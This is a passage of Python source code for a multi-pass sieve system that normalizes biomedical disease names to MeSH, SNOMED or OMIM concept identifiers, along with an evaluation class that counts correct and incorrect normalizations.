data):\n\n for i in range(int(data.config['norm_rule_num'])+1):\n Evaluation.map_whichSieveFires[i] = 0\n\n\n @classmethod\n def incrementTotal(self):\n Evaluation.totalNames += 1\n\n @classmethod\n def incrementTP(self):\n Evaluation.tp += 1\n\n @classmethod\n def incrementFP(self):\n Evaluation.fp += 1\n\n\n @classmethod\n def evaluateClassification(self, concept, concepts):\n Evaluation.incrementTotal()\n if (concept.getGoldMeSHorSNOMEDCui() != u\"\" and concept.getGoldMeSHorSNOMEDCui() == concept.getCui()) \\\n or (len(concept.getGoldOMIMCuis()) != 0 and concept.getCui() in concept.getGoldOMIMCuis()):\n Evaluation.incrementTP()\n elif concept.getGoldMeSHorSNOMEDCui().find(u\"|\") != -1 and concept.getCui().find(u\"|\") != -1:\n gold = set(re.split(r\"\\|\", concept.getGoldMeSHorSNOMEDCui()))\n predicted = set(re.split(r\"\\|\", concept.getCui()))\n\n bFindPredictNotInGold = False\n for p in predicted:\n if p not in gold:\n bFindPredictNotInGold = True\n break\n if bFindPredictNotInGold:\n Evaluation.incrementFP()\n else:\n Evaluation.incrementTP()\n\n minus_set = gold - predicted\n if len(minus_set) == 0:\n Evaluation.incrementTP()\n else :\n Evaluation.incrementFP()\n\n elif concept.getAlternateCuis() is not None and len(concept.getAlternateCuis()) != 0 :\n if concept.getGoldMeSHorSNOMEDCui() != u\"\" and concept.getGoldMeSHorSNOMEDCui() in concept.getAlternateCuis() :\n Evaluation.incrementTP()\n concept.setCui(concept.getGoldMeSHorSNOMEDCui())\n\n elif len(concept.getGoldOMIMCuis()) != 0 and Util.containsAny(concept.getAlternateCuis(), concept.getGoldOMIMCuis()) :\n Evaluation.incrementTP();\n if len(concept.getGoldOMIMCuis()) == 1:\n concept.setCui(concept.getGoldOMIMCuis()[0])\n\n else :\n Evaluation.incrementFP()\n else :\n Evaluation.incrementFP()\n\n count = Evaluation.map_whichSieveFires.get(concept.normalizingSieveLevel)\n count += 1\n Evaluation.map_whichSieveFires[concept.normalizingSieveLevel] = count\n\n @classmethod\n def computeAccuracy(self):\n\n Evaluation.accuracy = Evaluation.tp * 1.0 / Evaluation.totalNames\n\n @classmethod\n def printResults(self):\n\n print(\"*********************\")\n print(\"Total Names: {}\".format(Evaluation.totalNames))\n print(\"True Normalizations: {}\".format(Evaluation.tp))\n print(\"False Normalizations: {}\".format(Evaluation.fp))\n print(\"Accuracy: {}\".format(Evaluation.accuracy))\n print(\"*********************\")\n\n for sieve_level in Evaluation.map_whichSieveFires:\n if sieve_level == 0:\n print(\"{} unmapped names, accounting for {:.2f}%\".format(Evaluation.map_whichSieveFires[sieve_level],\n Evaluation.map_whichSieveFires[sieve_level]*100.0/Evaluation.totalNames))\n else:\n print(\"Sieve {} fires {} times, accounting for {:.2f}%\".format(sieve_level, Evaluation.map_whichSieveFires[sieve_level],\n Evaluation.map_whichSieveFires[sieve_level]*100.0/Evaluation.totalNames))\n\n print(\"*********************\")\n\n\n\n\n\nclass MultiPassSieveNormalizer:\n maxSieveLevel = 0\n\n def __init__(self):\n pass\n\n @classmethod\n def pass_(self, concept, currentSieveLevel):\n if concept.getCui() != u\"\":\n concept.setAlternateCuis(Sieve.getAlternateCuis(concept.getCui()))\n concept.setNormalizingSieveLevel(currentSieveLevel-1)\n\n return False\n\n\n if currentSieveLevel > MultiPassSieveNormalizer.maxSieveLevel:\n return False\n\n return True\n\n @classmethod\n def applyMultiPassSieve(self, concept):\n currentSieveLevel = 1\n\n # Sieve 1\n concept.setCui(Sieve.exactMatchSieve(concept.getName()))\n currentSieveLevel += 1\n if not MultiPassSieveNormalizer.pass_(concept, currentSieveLevel):\n return\n\n # Sieve 2\n concept.setCui(Sieve.exactMatchSieve(concept.getNameExpansion()))\n currentSieveLevel += 1\n if not MultiPassSieveNormalizer.pass_(concept, currentSieveLevel):\n return\n\n # Sieve 3\n concept.setCui(PrepositionalTransformSieve.apply(concept))\n currentSieveLevel += 1\n if not MultiPassSieveNormalizer.pass_(concept, currentSieveLevel):\n return\n\n # Sieve 4\n concept.setCui(SymbolReplacementSieve.apply(concept))\n currentSieveLevel += 1\n if not MultiPassSieveNormalizer.pass_(concept, currentSieveLevel):\n return\n\n # Sieve 5\n concept.setCui(HyphenationSieve.apply(concept))\n currentSieveLevel += 1\n if not MultiPassSieveNormalizer.pass_(concept, currentSieveLevel):\n return\n\n # Sieve 6\n concept.setCui(AffixationSieve.apply(concept))\n currentSieveLevel += 1\n if not MultiPassSieveNormalizer.pass_(concept, currentSieveLevel):\n return\n\n # Sieve 7\n concept.setCui(DiseaseModifierSynonymsSieve.apply(concept))\n currentSieveLevel += 1\n if not MultiPassSieveNormalizer.pass_(concept, currentSieveLevel):\n return\n\n # Sieve 8\n concept.setCui(StemmingSieve.apply(concept))\n currentSieveLevel += 1\n if not MultiPassSieveNormalizer.pass_(concept, currentSieveLevel):\n return\n\n # Sieve 9\n concept.setCui(CompoundPhraseSieve.applyNCBI(concept.getName()))\n currentSieveLevel += 1\n if not MultiPassSieveNormalizer.pass_(concept, currentSieveLevel):\n return\n\n # Sieve 10\n concept.setCui(SimpleNameSieve.apply(concept))\n currentSieveLevel += 1\n if not MultiPassSieveNormalizer.pass_(concept, currentSieveLevel):\n return\n\n # Sieve 11\n concept.setCui(PartialMatchNCBISieve.apply(concept))\n currentSieveLevel += 1\n if not MultiPassSieveNormalizer.pass_(concept, currentSieveLevel):\n return\n\n\n\nclass Sieve:\n standardTerminology = Terminology()\n trainingDataTerminology = Terminology()\n tac2017Terminology = Terminology()\n use_tac2017Terminology = False\n\n @classmethod\n def setStandardTerminology(self, dictionary, isMeddra_dict):\n Sieve.standardTerminology.loadTerminology(dictionary, isMeddra_dict)\n\n @classmethod\n def clearStandardTerminology(self):\n Sieve.standardTerminology.clearTerminology()\n\n @classmethod\n def setTrainingDataTerminology(self, train_path, dictionary_reverse, isMeddra_dict):\n Sieve.trainingDataTerminology.loadTrainingDataTerminology(train_path, dictionary_reverse, isMeddra_dict)\n\n @classmethod\n def clearTrainingDataTerminology(self):\n Sieve.trainingDataTerminology.clearTerminology()\n\n @classmethod\n def setTrainingDataTerminology_frompath(self, train_path, dictionary_reverse, isMeddra_dict):\n Sieve.trainingDataTerminology.loadTrainingDataTerminology_frompath(train_path, dictionary_reverse, isMeddra_dict)\n\n @classmethod\n def setTAC2017Terminology(self, train_path, dictionary):\n Sieve.tac2017Terminology.loadTAC2017Terminology(train_path, dictionary)\n Sieve.use_tac2017Terminology = True\n\n @classmethod\n def clearTAC2017Terminology(self):\n Sieve.tac2017Terminology.clearTerminology()\n Sieve.use_tac2017Terminology = False\n\n @classmethod\n def getAlternateCuis(self, cui):\n alternateCuis = list()\n if cui in Sieve.trainingDataTerminology.getCuiAlternateCuiMap():\n alternateCuis.extend(Sieve.trainingDataTerminology.getCuiAlternateCuiMap().get(cui))\n\n if cui in Sieve.standardTerminology.getCuiAlternateCuiMap():\n alternateCuis.extend(Sieve.standardTerminology.getCuiAlternateCuiMap().get(cui))\n\n if Sieve.use_tac2017Terminology:\n if cui in Sieve.tac2017Terminology.getCuiAlternateCuiMap():\n alternateCuis.extend(Sieve.tac2017Terminology.getCuiAlternateCuiMap().get(cui))\n\n return alternateCuis\n\n @classmethod\n def getTerminologyNameCui(self, nameToCuiListMap, name):\n return nameToCuiListMap.get(name)[0] if name in nameToCuiListMap and len(nameToCuiListMap.get(name)) == 1 else u\"\"\n\n\n @classmethod\n def exactMatchSieve(self, name):\n cui = u\"\"\n # check against names in the training data\n cui = Sieve.getTerminologyNameCui(Sieve.trainingDataTerminology.getNameToCuiListMap(), name)\n if cui != u\"\":\n return cui\n\n # check against names in the dictionary\n cui = Sieve.getTerminologyNameCui(Sieve.standardTerminology.getNameToCuiListMap(), name)\n if cui != u\"\":\n return cui\n\n if Sieve.use_tac2017Terminology:\n cui = Sieve.getTerminologyNameCui(Sieve.tac2017Terminology.getNameToCuiListMap(), name)\n if cui != u\"\":\n return cui\n\n return cui\n\n\n @classmethod\n def getTrainingDataTerminology(self):\n return Sieve.trainingDataTerminology\n\n @classmethod\n def getTAC2017Terminology(self):\n return Sieve.tac2017Terminology\n\n @classmethod\n def normalize(self, namesKnowledgeBase):\n for name in namesKnowledgeBase :\n cui = Sieve.exactMatchSieve(name)\n if cui != u\"\":\n return cui\n\n return u\"\"\n\n @classmethod\n def getStandardTerminology(self):\n return Sieve.standardTerminology\n\n\nclass PrepositionalTransformSieve(Sieve):\n\n @classmethod\n def apply(self, concept):\n PrepositionalTransformSieve.init(concept)\n PrepositionalTransformSieve.transformName(concept)\n return Sieve.normalize(concept.getNamesKnowledgeBase())\n\n @classmethod\n def init(self, concept):\n concept.setNamesKnowledgeBase(concept.getName())\n if concept.getNameExpansion() != u\"\":\n concept.setNamesKnowledgeBase(concept.getNameExpansion())\n\n @classmethod\n def transformName(self, concept):\n namesForTransformation = list(concept.getNamesKnowledgeBase())\n transformedNames = list()\n\n for nameForTransformation in namesForTransformation:\n prepositionInName = Ling.getStringPreposition(nameForTransformation)\n\n if prepositionInName != u\"\":\n transformedNames = Util.addUnique(transformedNames, PrepositionalTransformSieve.substitutePrepositionsInPhrase(prepositionInName, nameForTransformation))\n transformedNames = Util.setList(transformedNames, PrepositionalTransformSieve.swapPhrasalSubjectAndObject(prepositionInName, re.split(r\"\\s+\", nameForTransformation)))\n else :\n transformedNames = Util.addUnique(transformedNames, PrepositionalTransformSieve.insertPrepositionsInPhrase(nameForTransformation, re.split(r\"\\s+\", nameForTransformation)))\n\n concept.setNamesKnowledgeBase(transformedNames)\n\n @classmethod\n def insertPrepositionsInPhrase(self, phrase, phraseTokens):\n\n newPrepositionalPhrases = list()\n for preposition in Ling.PREPOSITIONS:\n\n newPrepositionalPhrase = (Ling.getSubstring(phraseTokens, 1, len(phraseTokens))+u\" \"+preposition+u\" \"+phraseTokens[0]).strip()\n newPrepositionalPhrases = Util.setList(newPrepositionalPhrases, newPrepositionalPhrase)\n\n newPrepositionalPhrase = (phraseTokens[len(phraseTokens)-1]+u\" \"+preposition+u\" \"+Ling.getSubstring(phraseTokens, 0, len(phraseTokens)-1)).strip()\n newPrepositionalPhrases = Util.setList(newPrepositionalPhrases, newPrepositionalPhrase)\n\n return newPrepositionalPhrases\n\n\n\n @classmethod\n def substitutePrepositionsInPhrase(self, prepositionInPhrase, phrase):\n newPrepositionalPhrases = list()\n for preposition in Ling.PREPOSITIONS:\n if preposition == prepositionInPhrase:\n continue\n\n newPrepositionalPhrase = (phrase.replace(u\" \" + prepositionInPhrase + u\" \", u\" \" + preposition + u\" \")).strip()\n newPrepositionalPhrases = Util.setList(newPrepositionalPhrases, newPrepositionalPhrase)\n\n return newPrepositionalPhrases\n\n @classmethod\n def swapPhrasalSubjectAndObject(self, prepositionInPhrase, phraseTokens) :\n prepositionTokenIndex = Util.getTokenIndex(phraseTokens, prepositionInPhrase)\n return (Ling.getSubstring(phraseTokens, prepositionTokenIndex+1, len(phraseTokens))+u\" \"+\n Ling.getSubstring(phraseTokens, 0, prepositionTokenIndex)).strip() if prepositionTokenIndex != -1 else u\"\"\n\n\nclass SymbolReplacementSieve(Sieve):\n\n @classmethod\n def apply(self, concept):\n SymbolReplacementSieve.transformName(concept)\n return Sieve.normalize(concept.getNamesKnowledgeBase())\n\n @classmethod\n def transformName(self, concept):\n namesForTransformation = list(concept.getNamesKnowledgeBase())\n transformedNames = list()\n\n for nameForTransformation in namesForTransformation:\n transformedNames = Util.addUnique(transformedNames, SymbolReplacementSieve.substituteSymbolsInStringWithWords(nameForTransformation))\n transformedNames = Util.addUnique(transformedNames, SymbolReplacementSieve.substituteWordsInStringWithSymbols(nameForTransformation))\n\n\n concept.setNamesKnowledgeBase(transformedNames)\n\n @classmethod\n def getClinicalReportTypeSubstitutions(self, string):\n newStrings = list()\n for digit in Ling.getDigitToWordMap():\n if string.find(digit) == -1:\n continue\n wordsList = Ling.getDigitToWordMap().get(digit)\n for word in wordsList:\n newString = string.replace(digit, word)\n if newString != string:\n newStrings = Util.setList(newStrings, newString)\n\n return newStrings\n\n @classmethod\n def getBiomedicalTypeSubstitutions(self, string):\n if string.find(u\"and/or\") != -1:\n string = string.replace(u\"and/or\", u\"and\")\n if string.find(u\"/\") != -1:\n string = string.replace(u\"/\", u\" and \")\n if string.find(u\" (\") != -1 and string.find(u\")\") != -1:\n string = string.replace(u\" (\", u\"\").replace(u\")\", u\"\")\n elif string.find(u\"(\") != -1 and string.find(u\")\") != -1:\n string = string.replace(u\"(\", u\"\").replace(u\")\", u\"\")\n return string\n\n\n\n @classmethod\n def substituteSymbolsInStringWithWords(self, string):\n newStrings = SymbolReplacementSieve.getClinicalReportTypeSubstitutions(string)\n tempNewStrings = list()\n for newString in newStrings:\n tempNewStrings = Util.setList(tempNewStrings, SymbolReplacementSieve.getBiomedicalTypeSubstitutions(newString))\n newStrings = Util.addUnique(newStrings, tempNewStrings)\n newStrings = Util.setList(newStrings, SymbolReplacementSieve.getBiomedicalTypeSubstitutions(string))\n return newStrings\n\n @classmethod\n def substituteWordsInStringWithSymbols(self, string):\n newStrings = list()\n for word in Ling.getWordToDigitMap():\n if string.find(word) == -1:\n continue\n digit = Ling.getWordToDigitMap().get(word)\n newString = string.replace(word, digit)\n if newString != string:\n newStrings = Util.setList(newStrings, newString)\n\n return newStrings\n\n\nclass HyphenationSieve(Sieve):\n @classmethod\n def apply(self, concept):\n HyphenationSieve.transformName(concept)\n return Sieve.normalize(concept.getNamesKnowledgeBase())\n\n @classmethod\n def transformName(self, concept):\n namesForTransformation = list(concept.getNamesKnowledgeBase())\n transformedNames = list()\n\n for nameForTransformation in namesForTransformation:\n transformedNames = Util.addUnique(transformedNames, HyphenationSieve.hyphenateString(re.split(r\"\\s+\", nameForTransformation)))\n transformedNames = Util.addUnique(transformedNames, HyphenationSieve.dehyphenateString(re.split(r\"\\-\", nameForTransformation)))\n\n\n concept.setNamesKnowledgeBase(transformedNames)\n\n @classmethod\n def hyphenateString(self, stringTokens):\n hyphenatedStrings = list()\n i = 1\n while i < len(stringTokens):\n hyphenatedString = u\"\"\n j = 0\n while j < len(stringTokens):\n if j == i:\n hyphenatedString += u\"-\"+stringTokens[j]\n else:\n hyphenatedString = stringTokens[j] if hyphenatedString == u\"\" else hyphenatedString+u\" \"+stringTokens[j]\n j += 1\n\n hyphenatedStrings = Util.setList(hyphenatedStrings, hyphenatedString)\n i += 1\n return hyphenatedStrings\n\n @classmethod\n def dehyphenateString(self, stringTokens):\n dehyphenatedStrings = list()\n i = 1\n while i < len(stringTokens):\n\n dehyphenatedString = u\"\"\n j = 0\n while j < len(stringTokens):\n if j == i:\n dehyphenatedString += u\" \"+stringTokens[j]\n else:\n dehyphenatedString = stringTokens[j] if dehyphenatedString == u\"\" else dehyphenatedString+u\"-\"+stringTokens[j]\n j += 1\n\n dehyphenatedStrings = Util.setList(dehyphenatedStrings, dehyphenatedString)\n i += 1\n\n return dehyphenatedStrings\n\nclass AffixationSieve(Sieve):\n\n @classmethod\n def apply(self, concept):\n AffixationSieve.transformName(concept)\n return Sieve.normalize(concept.getNamesKnowledgeBase())\n\n @classmethod\n def transformName(self, concept):\n namesForTransformation = list(concept.getNamesKnowledgeBase())\n transformedNames = list()\n\n for nameForTransformation in namesForTransformation:\n transformedNames = Util.addUnique(transformedNames, AffixationSieve.affix(nameForTransformation))\n\n\n concept.setNamesKnowledgeBase(transformedNames);\n\n @classmethod\n def getAllStringTokenSuffixationCombinations(self, stringTokens):\n suffixatedPhrases = list()\n for stringToken in stringTokens:\n suffix = Ling.getSuffix(stringToken)\n forSuffixation = None if suffix == u\"\" else Ling.getSuffixMap().get(suffix)\n\n if len(suffixatedPhrases) == 0:\n if forSuffixation is None:\n suffixatedPhrases = Util.setList(suffixatedPhrases, stringToken)\n elif len(forSuffixation) == 0:\n suffixatedPhrases = Util.setList(suffixatedPhrases, stringToken.replace(suffix, u\"\"))\n else :\n i = 0\n while i < len(forSuffixation):\n suffixatedPhrases = Util.setList(suffixatedPhrases, stringToken.replace(suffix, forSuffixation[i]))\n i += 1\n\n else :\n if forSuffixation is None:\n for i in range(len(suffixatedPhrases)):\n suffixatedPhrases[i] = suffixatedPhrases[i]+u\" \"+stringToken\n\n elif len(forSuffixation) == 0:\n for i in range(len(suffixatedPhrases)):\n suffixatedPhrases[i] = suffixatedPhrases[i]+u\" \"+stringToken.replace(suffix, u\"\")\n\n else:\n tempSuffixatedPhrases = list()\n for i in range(len(suffixatedPhrases)):\n suffixatedPhrase = suffixatedPhrases[i]\n for j in range(len(forSuffixation)):\n tempSuffixatedPhrases = Util.setList(tempSuffixatedPhrases, suffixatedPhrase+u\" \"+stringToken.replace(suffix, forSuffixation[j]))\n\n suffixatedPhrases = list(tempSuffixatedPhrases)\n tempSuffixatedPhrases = None\n\n\n return suffixatedPhrases\n\n @classmethod\n def getUniformStringTokenSuffixations(self, stringTokens, string):\n suffixatedPhrases = list()\n for stringToken in stringTokens:\n suffix = Ling.getSuffix(stringToken)\n forSuffixation = None if suffix == u\"\" else Ling.getSuffixMap().get(suffix)\n\n if forSuffixation == None:\n continue\n\n if len(forSuffixation) == 0:\n Util.setList(suffixatedPhrases, string.replace(suffix, u\"\"))\n continue\n\n for i in range(len(forSuffixation)):\n suffixatedPhrases = Util.setList(suffixatedPhrases, string.replace(suffix, forSuffixation[i]))\n\n return suffixatedPhrases\n\n\n @classmethod\n def suffixation(self, stringTokens, string):\n suffixatedPhrases = AffixationSieve.getAllStringTokenSuffixationCombinations(stringTokens)\n return Util.addUnique(suffixatedPhrases, AffixationSieve.getUniformStringTokenSuffixations(stringTokens, string))\n\n @classmethod\n def prefixation(self, stringTokens, string):\n prefixatedPhrase = u\"\"\n for stringToken in stringTokens:\n prefix = Ling.getPrefix(stringToken)\n forPrefixation = u\"\" if prefix == u\"\" else Ling.getPrefixMap().get(prefix)\n if prefixatedPhrase == u\"\":\n prefixatedPhrase = stringToken if prefix == u\"\" else stringToken.replace(prefix, forPrefixation)\n else:\n prefixatedPhrase = prefixatedPhrase+u\" \"+stringToken if prefix == u\"\" else prefixatedPhrase+u\" \"+stringToken.replace(prefix, forPrefixation)\n\n return prefixatedPhrase\n\n @classmethod\n def affixation(self, stringTokens, string):\n affixatedPhrase = u\"\"\n for stringToken in stringTokens:\n affix = (re.split(r\"\\|\", Ling.AFFIX)[0] if stringToken.find(re.split(r\"\\|\",Ling.AFFIX)[0]) != -1 else re.split(r\"\\|\", Ling.AFFIX)[1]) \\\n if re.match(r\".*(\"+Ling.AFFIX+r\").*\", stringToken) else u\"\"\n forAffixation = u\"\" if affix == u\"\" else Ling.getAffixMap().get(affix)\n if affixatedPhrase == u\"\":\n affixatedPhrase = stringToken if affix == u\"\" else stringToken.replace(affix, forAffixation)\n else:\n affixatedPhrase = affixatedPhrase+u\" \"+stringToken if affix == u\"\" else affixatedPhrase+u\" \"+stringToken.replace(affix, forAffixation)\n\n return affixatedPhrase\n\n @classmethod\n def affix(self, string):\n stringTokens = re.split(r\"\\s\", string)\n newPhrases = AffixationSieve.suffixation(stringTokens, string)\n newPhrases = Util.setList(newPhrases, AffixationSieve.prefixation(stringTokens, string))\n newPhrases = Util.setList(newPhrases, AffixationSieve.affixation(stringTokens, string))\n return newPhrases\n\n\nclass DiseaseModifierSynonymsSieve(Sieve):\n\n @classmethod\n def apply(self, concept):\n if concept.getName() not in Ling.PLURAL_DISORDER_SYNONYMS and concept.getName() not in Ling.SINGULAR_DISORDER_SYNONYMS:\n DiseaseModifierSynonymsSieve.transformName(concept)\n return Sieve.normalize(concept.getNamesKnowledgeBase())\n\n return u\"\"\n\n @classmethod\n def transformName(self, concept):\n namesForTransformation = list(concept.getNamesKnowledgeBase())\n transformedNames = list()\n\n for nameForTransformation in namesForTransformation:\n nameForTransformationTokens = re.split(r\"\\s+\", nameForTransformation)\n modifier = DiseaseModifierSynonymsSieve.getModifier(nameForTransformationTokens, Ling.PLURAL_DISORDER_SYNONYMS)\n if modifier != u\"\":\n transformedNames = Util.addUnique(transformedNames, DiseaseModifierSynonymsSieve.substituteDiseaseModifierWithSynonyms(nameForTransformation, modifier, Ling.PLURAL_DISORDER_SYNONYMS))\n transformedNames = Util.setList(transformedNames, DiseaseModifierSynonymsSieve.deleteTailModifier(nameForTransformationTokens, modifier))\n continue\n\n\n modifier = DiseaseModifierSynonymsSieve.getModifier(nameForTransformationTokens, Ling.SINGULAR_DISORDER_SYNONYMS)\n if modifier != u\"\":\n transformedNames = Util.addUnique(transformedNames, DiseaseModifierSynonymsSieve.substituteDiseaseModifierWithSynonyms(nameForTransformation, modifier, Ling.SINGULAR_DISORDER_SYNONYMS))\n transformedNames = Util.setList(transformedNames, DiseaseModifierSynonymsSieve.deleteTailModifier(nameForTransformationTokens, modifier))\n continue\n\n transformedNames = Util.addUnique(transformedNames, DiseaseModifierSynonymsSieve.appendModifier(nameForTransformation, Ling.SINGULAR_DISORDER_SYNONYMS))\n\n\n concept.setNamesKnowledgeBase(transformedNames);\n\n @classmethod\n def substituteDiseaseModifierWithSynonyms(self, string, toReplaceWord, synonyms):\n newPhrases = list()\n for synonym in synonyms:\n if toReplaceWord == synonym:\n continue\n newPhrase = string.replace(toReplaceWord, synonym)\n newPhrases = Util.setList(newPhrases, newPhrase)\n\n return newPhrases\n\n @classmethod\n def deleteTailModifier(self, stringTokens, modifier):\n return Ling.getSubstring(stringTokens, 0, len(stringTokens) - 1) if stringTokens[len(stringTokens) - 1] == modifier else u\"\"\n\n @classmethod\n def appendModifier(self, string, modifiers):\n newPhrases = list()\n for modifier in modifiers:\n newPhrase = string + u\" \" + modifier\n newPhrases = Util.setList(newPhrases, newPhrase)\n\n return newPhrases\n\n\n @classmethod\n def getModifier(self, stringTokens, modifiers):\n for modifier in modifiers:\n index = Util.getTokenIndex(stringTokens, modifier)\n if index != -1:\n return stringTokens[index]\n\n return u\"\"\n\n\nclass StemmingSieve(Sieve):\n @classmethod\n def apply(self, concept):\n StemmingSieve.transformName(concept)\n return StemmingSieve.normalize(concept)\n\n @classmethod\n def transformName(self, concept):\n namesForTransformation = list(concept.getNamesKnowledgeBase())\n transformedNames = list()\n\n for nameForTransformation in namesForTransformation:\n transformedNames = Util.setList(transformedNames, Ling.getStemmedPhrase(nameForTransformation))\n\n\n concept.setStemmedNamesKnowledgeBase(transformedNames)\n\n @classmethod\n def normalize(self, concept):\n for name in concept.getStemmedNamesKnowledgeBase():\n cui = StemmingSieve.exactMatchSieve(name)\n if cui != u\"\":\n return cui\n\n return u\"\"\n\n @classmethod\n def exactMatchSieve(self, name):\n cui = u\"\"\n\n # checks against names in training data\n cui = Sieve.getTerminologyNameCui(Sieve.getTrainingDataTerminology().getStemmedNameToCuiListMap(), name)\n if cui != u\"\":\n return cui\n\n # checks against names in dictionary\n cui = Sieve.getTerminologyNameCui(Sieve.getStandardTerminology().getStemmedNameToCuiListMap(), name)\n if cui != u\"\":\n return cui\n\n if Sieve.use_tac2017Terminology:\n cui = Sieve.getTerminologyNameCui(Sieve.getTAC2017Terminology().getStemmedNameToCuiListMap(), name)\n if cui != u\"\":\n return cui\n\n return cui\n\n\n\n\nclass CompoundPhraseSieve(Sieve):\n\n @classmethod\n def applyNCBI(self, name):\n cui = CompoundPhraseSieve.apply(name)\n if cui != u\"\" or (name.find(u\" and \") == -1 and name.find(u\" or \") == -1):\n return cui\n\n compoundWord = u\"and\" if name.find(u\" and \") else u\"or\"\n nameTokens = re.split(r\"\\s+\", name)\n index = Util.getTokenIndex(nameTokens, compoundWord)\n\n if index == 1:\n replacement1 = nameTokens[0]\n replacement2 = nameTokens[2]+u\" \"+nameTokens[3] if nameTokens[2] == u\"the\" else nameTokens[2]\n phrase = replacement1+u\" \"+compoundWord+u\" \"+replacement2\n replacement2 = nameTokens[3] if nameTokens[2] == u\"the\" else nameTokens[2]\n cui1 = Sieve.exactMatchSieve(name.replace(phrase, replacement1))\n\n cui2 = Sieve.exactMatchSieve(name.replace(phrase, replacement2))\n if cui1 != u\"\" and cui2 != u\"\":\n return cui2+u\"|\"+cui1 if cui2+u\"|\"+cui1 in Sieve.getTrainingDataTerminology().getCuiToNameListMap() else cui1+u\"|\"+cui2\n\n\n return u\"\"\n\n @classmethod\n def apply(self, name):\n cui = u\"\"\n\n cui = Sieve.getTerminologyNameCui(Sieve.getTrainingDataTerminology().getCompoundNameToCuiListMap(), name)\n if cui != u\"\":\n return cui\n\n cui = Sieve.getTerminologyNameCui(Sieve.getStandardTerminology().getCompoundNameToCuiListMap(), name)\n if cui != u\"\":\n return cui\n\n if Sieve.use_tac2017Terminology:\n cui = Sieve.getTerminologyNameCui(Sieve.getTAC2017Terminology().getCompoundNameToCuiListMap(), name)\n if cui != u\"\":\n return cui\n\n return cui\n\n\nclass SimpleNameSieve(Sieve):\n\n @classmethod\n def apply(self, concept):\n namesForTransformation = SimpleNameSieve.getNamesForTransformation(concept)\n namesKnowledgeBase = SimpleNameSieve.transformName(namesForTransformation)\n cui = Sieve.normalize(namesKnowledgeBase)\n return SimpleNameSieve.normalize(concept.getName()) if cui == u\"\" else cui\n\n @classmethod\n def getNamesForTransformation(self, concept):\n namesForTransformation = list()\n namesForTransformation.append(concept.getName())\n if concept.getNameExpansion() != u\"\":\n namesForTransformation.append(concept.getNameExpansion())\n return namesForTransformation\n\n @classmethod\n def transformName(self, namesForTransformation):\n transformedNames = list()\n\n for nameForTransformation in namesForTransformation:\n transformedNames = Util.addUnique(transformedNames, SimpleNameSieve.deletePhrasalModifier(nameForTransformation, re.split(r\"\\s\", nameForTransformation)))\n\n\n return transformedNames\n\n @classmethod\n def deletePhrasalModifier(self, phrase, phraseTokens):\n newPhrases = list()\n if len(phraseTokens) > 3:\n newPhrase = Ling.getSubstring(phraseTokens, 0, len(phraseTokens)-2)+u\" \"+phraseTokens[len(phraseTokens)-1]\n newPhrases = Util.setList(newPhrases, newPhrase)\n newPhrase = Ling.getSubstring(phraseTokens, 1, len(phraseTokens))\n newPhrases = Util.setList(newPhrases, newPhrase)\n\n return newPhrases\n\n\n @classmethod\n def getTerminologySimpleNames(self, phraseTokens):\n newPhrases = list()\n if len(phraseTokens) == 3 :\n newPhrase = phraseTokens[0]+\" \"+phraseTokens[2]\n newPhrases = Util.setList(newPhrases, newPhrase)\n newPhrase = phraseTokens[1]+\" \"+phraseTokens[2]\n newPhrases = Util.setList(newPhrases, newPhrase)\n\n return newPhrases\n\n @classmethod\n def normalize(self, name):\n cui = u\"\"\n\n cui = Sieve.getTerminologyNameCui(Sieve.getTrainingDataTerminology().getSimpleNameToCuiListMap(), name)\n if cui != u\"\":\n return cui\n\n if Sieve.use_tac2017Terminology:\n cui = Sieve.getTerminologyNameCui(Sieve.getTAC2017Terminology().getSimpleNameToCuiListMap(), name)\n if cui != u\"\":\n return cui\n\n return cui\n\n\nclass PartialMatchNCBISieve:\n @classmethod\n def apply(self, concept):\n name = concept.getName()\n nameTokens = re.split(r\"\\s+\", name)\n return PartialMatchNCBISieve.partialMatch(name, nameTokens)\n\n @classmethod\n def partialMatch(self, phrase, phraseTokens):\n partialMatchedPhrases = list()\n candidateCuiDataMap = PartialMatchNCBISieve.init()\n\n for phraseToken in phraseTokens:\n if phraseToken in Ling.getStopwordsList():\n continue\n candidatePhrases = None\n map = -1\n\n if phraseToken in Sieve.getTrainingDataTerminology().getTokenToNameListMap():\n candidatePhrases = list(Sieve.getTrainingDataTerminology().getTokenToNameListMap().get(phraseToken))\n map = 2\n\n elif phraseToken in Sieve.getStandardTerminology().getTokenToNameListMap():\n candidatePhrases = list(Sieve.getStandardTerminology().getTokenToNameListMap().get(phraseToken))\n map = 3\n\n\n if candidatePhrases is None:\n continue\n\n temp = list()\n for t in candidatePhrases:\n if t in partialMatchedPhrases:\n continue\n temp.append(t)\n candidatePhrases = temp\n\n candidateCuiDataMap = PartialMatchNCBISieve.ncbiPartialMatch(phrase, candidatePhrases, partialMatchedPhrases, Sieve.getTrainingDataTerminology() if map == 2 else Sieve.getStandardTerminology(), candidateCuiDataMap)\n\n return PartialMatchNCBISieve.getCui(candidateCuiDataMap.get(1), candidateCuiDataMap.get(2)) if len(candidateCuiDataMap.get(1)) != 0 else u\"\"\n\n @classmethod\n def init(self):\n candidateCuiDataMap = dict()\n candidateCuiDataMap[1] = dict()\n candidateCuiDataMap[2] = dict()\n return candidateCuiDataMap\n\n @classmethod\n def ncbiPartialMatch(self, phrase, candidatePhrases, partialMatchedPhrases, terminology, cuiCandidateDataMap):\n cuiCandidateMatchingTokensCountMap = cuiCandidateDataMap.get(1)\n cuiCandidateLengthMap = cuiCandidateDataMap.get(2)\n\n for candidatePhrase in candidatePhrases:\n partialMatchedPhrases = Util.setList(partialMatchedPhrases, candidatePhrase)\n\n count = Ling.getMatchingTokensCount(phrase, candidatePhrase)\n length = len(re.split(r\"\\s+\", candidatePhrase))\n cui = terminology.getNameToCuiListMap().get(candidatePhrase)[0]\n\n if cui in cuiCandidateMatchingTokensCountMap:\n oldCount = cuiCandidateMatchingTokensCountMap.get(cui)\n if oldCount < count:\n cuiCandidateMatchingTokensCountMap[cui] = count\n cuiCandidateLengthMap[cui] = length\n\n continue\n\n\n cuiCandidateMatchingTokensCountMap[cui] = count\n cuiCandidateLengthMap[cui] = length\n\n\n cuiCandidateDataMap[1] = cuiCandidateMatchingTokensCountMap\n cuiCandidateDataMap[2] = cuiCandidateLengthMap\n return cuiCandidateDataMap\n\n @classmethod\n def getCui(self, cuiCandidateMatchedTokensCountMap, cuiCandidateLengthMap):\n cui = u\"\"\n maxMatchedTokensCount = -1\n matchedTokensCountCuiListMap = dict()\n for candidateCui in cuiCandidateMatchedTokensCountMap:\n matchedTokensCount = 